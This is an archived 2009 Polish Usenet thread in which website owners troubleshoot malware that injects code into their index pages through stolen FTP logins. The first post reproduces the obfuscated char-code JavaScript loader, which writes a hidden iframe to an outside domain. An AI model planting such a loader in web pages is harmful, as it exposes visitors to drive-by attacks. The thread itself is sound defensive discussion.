eGospodarka.pl
eGospodarka.pl poleca

eGospodarka.plGrupypl.internet.polip[ mallware doklejajacy zdalnie kod do stron ]
Ilość wypowiedzi w tym wątku: 28

  • 1. Data: 2009-02-09 10:46:16
    Temat: [ mallware doklejajacy zdalnie kod do stron ]
    Od: Matt Rutkowski <m...@g...com>

    Witam,

    czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
    dokleja zdalnie nastepujacy kod javascript do stron o nazwie
    index.php, index.html, main.html, main.php

    -- kod --

    <!-- ad --><script language="JavaScript">function rkfg(jflq){return
    String.fromCharCode(jflq);}var
    ohhe="0601051021140971091010321151140990610391041161
    1611205804704711511711210111410511111409710012204610
    5110102111047111112105115047063116061049051039032119
    1051001161040610390480390321041011051031041160610390
    4803903211511612110810106103911810511510509810510810
    5116121058032104105100100101110059039062060047105102
    114097109101062";var
    ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=r
    kfg(ohhe.substr
    (qhxk, 3));}window.status='Done';document.write(ifdm);</scr
    ipt>
    <!-- /ad -->

    -- kod --

    w/w kod tworzy ukryta iframe i laczy sie z adresem http://superioradz.info/opis/?t=13

    --
    Matt Rutkowski


  • 2. Data: 2009-02-09 11:11:17
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: Piotr Gackiewicz <g...@i...pl>

    Matt Rutkowski <m...@g...com> wrote:
    > Witam,
    >
    > czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
    > dokleja zdalnie nastepujacy kod javascript do stron o nazwie
    > index.php, index.html, main.html, main.php

    Nie wiem, czy z tym konkretnym syfem, ale z podobnymi miałem do czynienia
    kilkakrotnie. Zawsze doklejało się przez FTPa, inicjowanego zwykle z IP
    spoza Polski.

    Podejrzewam, że loginy i hasła wykradane są z rejestru Windows przez inny
    malware, podmiana plików była zawsze z innych IP niż zwykle używane do tych
    konkretnych kont FTP.

    --
    Piotr Gackiewicz


  • 3. Data: 2009-02-10 21:46:22
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: "Spamcop" <s...@d...piachu>

    Użytkownik "Piotr Gackiewicz" <g...@i...pl> napisał w wiadomości
    news:slrngp03qk.ll7.gacek@gacek.intertele.pl...
    > Matt Rutkowski <m...@g...com> wrote:
    >> Witam,
    >>
    >> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
    >> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
    >> index.php, index.html, main.html, main.php
    >
    > Nie wiem, czy z tym konkretnym syfem, ale z podobnymi miałem do czynienia
    > kilkakrotnie. Zawsze doklejało się przez FTPa, inicjowanego zwykle z IP
    > spoza Polski.
    >
    > Podejrzewam, że loginy i hasła wykradane są z rejestru Windows przez inny
    > malware, podmiana plików była zawsze z innych IP niż zwykle używane do
    > tych
    > konkretnych kont FTP.

    Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    wlasciwe prawa.

    --
    s.



  • 4. Data: 2009-02-11 07:00:00
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: "b...@n...pl" <b...@n...pl>

    Spamcop napisał(a):
    > Użytkownik "Piotr Gackiewicz" <g...@i...pl> napisał w wiadomości
    > news:slrngp03qk.ll7.gacek@gacek.intertele.pl...
    >> Matt Rutkowski <m...@g...com> wrote:
    >>> Witam,
    >>>
    >>> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
    >>> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
    >>> index.php, index.html, main.html, main.php
    >> Nie wiem, czy z tym konkretnym syfem, ale z podobnymi miałem do czynienia
    >> kilkakrotnie. Zawsze doklejało się przez FTPa, inicjowanego zwykle z IP
    >> spoza Polski.
    >>
    >> Podejrzewam, że loginy i hasła wykradane są z rejestru Windows przez inny
    >> malware, podmiana plików była zawsze z innych IP niż zwykle używane do
    >> tych
    >> konkretnych kont FTP.
    >
    > Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    > wlasciwe prawa.
    >

    Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
    wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie nagra.

    Ja ostatnio trafiłem na podobny syf, ale zamiast doklejać się wgrywa
    .htaccess z rewrite na stronkę z jakimś syfem.

    wer


  • 5. Data: 2009-02-11 17:02:09
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: "Spamcop" <s...@d...piachu>

    >> Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    >> wlasciwe prawa.
    >>
    >
    > Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
    > wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie
    > nagra.

    skoro www NIE bedzie mialo prawa do zapisu to jak ci ktos zrobi injecta?

    --
    s.



  • 6. Data: 2009-02-11 20:30:39
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: Jacek Osiecki <j...@c...pl>

    Dnia Wed, 11 Feb 2009 18:02:09 +0100, Spamcop napisał(a):
    >>> Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    >>> wlasciwe prawa.
    >> Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
    >> wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie
    >> nagra.
    > skoro www NIE bedzie mialo prawa do zapisu to jak ci ktos zrobi injecta?

    Gdzieś będzie musiało mieć, chyba że zrezygnujesz ze smarty ;)
    A na dziadostwa doklejające kod przez FTP i tak nic to nie da...

    Pozdrawiam,
    --
    Jacek Osiecki j...@c...pl GG:3828944
    I don't want something I need. I want something I want.


  • 7. Data: 2009-02-13 17:21:10
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: a...@g...com

    On Feb 11, 3:30 pm, Jacek Osiecki <j...@c...pl> wrote:
    > Dnia Wed, 11 Feb 2009 18:02:09 +0100, Spamcop napisał(a):
    >
    > >>> Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    > >>> wlasciwe prawa.
    > >> Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
    > >> wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie
    > >> nagra.
    > > skoro www NIE bedzie mialo prawa do zapisu to jak ci ktos zrobi injecta?
    >
    > Gdzieś będzie musiało mieć, chyba że zrezygnujesz ze smarty ;)
    > A na dziadostwa doklejające kod przez FTP i tak nic to nie da...
    >
    > Pozdrawiam,
    > --
    > Jacek Osiecki j...@c...pl GG:3828944
    > I don't want something I need. I want something I want.

    Mam identyczny problem - wczoraj to coś podoklejało mi właśnie taki
    kod, jaki podany został w pierwszym mailu.

    Dodam, że kod ten zostaje doklejany zaraz za znacznikiem <body>,
    jeżeli taki istnieje - w przeciwnym wypadku wrzuca go na końcu
    dokumentu.
    Mi dokleiło to ten kod do plików nazwanych index.html, index.php,
    main.html i home.html (więc zapewne do home.php też by dokleiło).
    Wczoraj to coś zaatakowało około południa, po tym jak wyrzuciłem ten
    kod - za jakąś godzine znowu się pojawił. Znowu usunąłem - za pół
    godziny znowu... Usunąłem - za kilka minut znowu, i w końcu
    zainstalowałem taki prototypowy wyłapywacz zawartości tablicy $_SERVER
    wszystkich, którzy wchodzą na stronę, i wtedy ataki ustały. Ale
    dzisiaj o 11:32 (taką mam datę ostatniej modyfikacji przy
    zaatakowanych plikach). Ten wyłapywacz $_SEVER'a jednak nic nie
    wykrył, czyli to coś musi chyba przez FTP edytować te pliki. Szukałem
    w logach apacha, ale nic niezwykłego tam nie znalazłem.

    Dodam że używam PHPTAL'a (system szablonów).

    Jeżeli będziecie wiedzieli coś więcej na ten temat, piszcie. Razem to
    coś pokonamy ;-)


  • 8. Data: 2009-02-13 17:29:54
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: crazy bejbi <t...@n...ma>

    a...@g...com pisze:
    > On Feb 11, 3:30 pm, Jacek Osiecki <j...@c...pl> wrote:
    >> Dnia Wed, 11 Feb 2009 18:02:09 +0100, Spamcop napisał(a):
    >>
    >>>>> Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    >>>>> wlasciwe prawa.
    >>>> Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
    >>>> wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie
    >>>> nagra.
    >>> skoro www NIE bedzie mialo prawa do zapisu to jak ci ktos zrobi injecta?
    >> Gdzieś będzie musiało mieć, chyba że zrezygnujesz ze smarty ;)
    >> A na dziadostwa doklejające kod przez FTP i tak nic to nie da...
    >>
    >> Pozdrawiam,
    >> --
    >> Jacek Osiecki j...@c...pl GG:3828944
    >> I don't want something I need. I want something I want.
    >
    > Mam identyczny problem - wczoraj to coś podoklejało mi właśnie taki
    > kod, jaki podany został w pierwszym mailu.
    >
    > Dodam, że kod ten zostaje doklejany zaraz za znacznikiem <body>,
    > jeżeli taki istnieje - w przeciwnym wypadku wrzuca go na końcu
    > dokumentu.
    > Mi dokleiło to ten kod do plików nazwanych index.html, index.php,
    > main.html i home.html (więc zapewne do home.php też by dokleiło).
    > Wczoraj to coś zaatakowało około południa, po tym jak wyrzuciłem ten
    > kod - za jakąś godzine znowu się pojawił. Znowu usunąłem - za pół
    > godziny znowu... Usunąłem - za kilka minut znowu, i w końcu
    > zainstalowałem taki prototypowy wyłapywacz zawartości tablicy $_SERVER
    > wszystkich, którzy wchodzą na stronę, i wtedy ataki ustały. Ale
    > dzisiaj o 11:32 (taką mam datę ostatniej modyfikacji przy
    > zaatakowanych plikach). Ten wyłapywacz $_SEVER'a jednak nic nie
    > wykrył, czyli to coś musi chyba przez FTP edytować te pliki. Szukałem
    > w logach apacha, ale nic niezwykłego tam nie znalazłem.

    są klasyczne połączenia ftp
    najpierw pobranie pliku np. index.php a potem wgranie go znowu.
    czyli jak ci sie dokleja, to znaczy, że masz syfa na kompie, który
    wykrada loginy i hasła do ftp (np. z totalcommandera)

    najprościej zmienić hasło do ftp

    Wojtek


  • 9. Data: 2009-02-13 17:36:01
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: a...@g...com

    On Feb 13, 6:29 pm, crazy bejbi <t...@n...ma> wrote:
    > a...@g...com pisze:
    >
    >
    >
    > > On Feb 11, 3:30 pm, Jacek Osiecki <j...@c...pl> wrote:
    > >> Dnia Wed, 11 Feb 2009 18:02:09 +0100, Spamcop napisał(a):
    >
    > >>>>> Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
    > >>>>> wlasciwe prawa.
    > >>>> Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
    > >>>> wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie
    > >>>> nagra.
    > >>> skoro www NIE bedzie mialo prawa do zapisu to jak ci ktos zrobi injecta?
    > >> Gdzieś będzie musiało mieć, chyba że zrezygnujesz ze smarty ;)
    > >> A na dziadostwa doklejające kod przez FTP i tak nic to nie da...
    >
    > >> Pozdrawiam,
    > >> --
    > >> Jacek Osiecki j...@c...pl GG:3828944
    > >> I don't want something I need. I want something I want.
    >
    > > Mam identyczny problem - wczoraj to coś podoklejało mi właśnie taki
    > > kod, jaki podany został w pierwszym mailu.
    >
    > > Dodam, że kod ten zostaje doklejany zaraz za znacznikiem <body>,
    > > jeżeli taki istnieje - w przeciwnym wypadku wrzuca go na końcu
    > > dokumentu.
    > > Mi dokleiło to ten kod do plików nazwanych index.html, index.php,
    > > main.html i home.html (więc zapewne do home.php też by dokleiło).
    > > Wczoraj to coś zaatakowało około południa, po tym jak wyrzuciłem ten
    > > kod - za jakąś godzine znowu się pojawił. Znowu usunąłem - za pół
    > > godziny znowu... Usunąłem - za kilka minut znowu, i w końcu
    > > zainstalowałem taki prototypowy wyłapywacz zawartości tablicy $_SERVER
    > > wszystkich, którzy wchodzą na stronę, i wtedy ataki ustały. Ale
    > > dzisiaj o 11:32 (taką mam datę ostatniej modyfikacji przy
    > > zaatakowanych plikach). Ten wyłapywacz $_SEVER'a jednak nic nie
    > > wykrył, czyli to coś musi chyba przez FTP edytować te pliki. Szukałem
    > > w logach apacha, ale nic niezwykłego tam nie znalazłem.
    >
    > są klasyczne połączenia ftp
    > najpierw pobranie pliku np. index.php a potem wgranie go znowu.
    > czyli jak ci sie dokleja, to znaczy, że masz syfa na kompie, który
    > wykrada loginy i hasła do ftp (np. z totalcommandera)
    >
    > najprościej zmienić hasło do ftp
    >
    > Wojtek

    Hm, no jakby ktoś zdobył dostęp do ftp, to by się chyba nie bawił w
    jakieś tam doklejanie kodu? :-) Ale faktycznie wszystkie hasła mam
    zapisane na kompie - używam linuksa, i tu normalnie edytor tekstu
    łączy mi się z serwerem, jeżeli chcę przeedytować jakiś plik :-) Ale w
    jakiś sposób to coś mogłoby wykraść hasła? Musiałoby się chyba z moim
    kompem połączyć?


  • 10. Data: 2009-02-13 20:34:48
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: crazy bejbi <t...@n...ma>

    a...@g...com pisze:

    > Hm, no jakby ktoś zdobył dostęp do ftp, to by się chyba nie bawił w
    > jakieś tam doklejanie kodu? :-) Ale faktycznie wszystkie hasła mam
    > zapisane na kompie - używam linuksa, i tu normalnie edytor tekstu
    > łączy mi się z serwerem, jeżeli chcę przeedytować jakiś plik :-) Ale w
    > jakiś sposób to coś mogłoby wykraść hasła? Musiałoby się chyba z moim
    > kompem połączyć?

    to nie robi człowiek, tylko bot. niemniej poszukaj w logach serwera ftp.
    ja 100% masz połączenia, ze user sie zalogował, potem pobrał plik
    index.php i od razu go wgrał znowu. po czym się rozłączył :)

    Wojtek

strony : [ 1 ] . 2 . 3


Szukaj w grupach

Szukaj w grupach

Eksperci egospodarka.pl

1 1 1

Wpisz nazwę miasta, dla którego chcesz znaleźć jednostkę ZUS.

Wzory dokumentów

Bezpłatne wzory dokumentów i formularzy.
Wyszukaj i pobierz za darmo: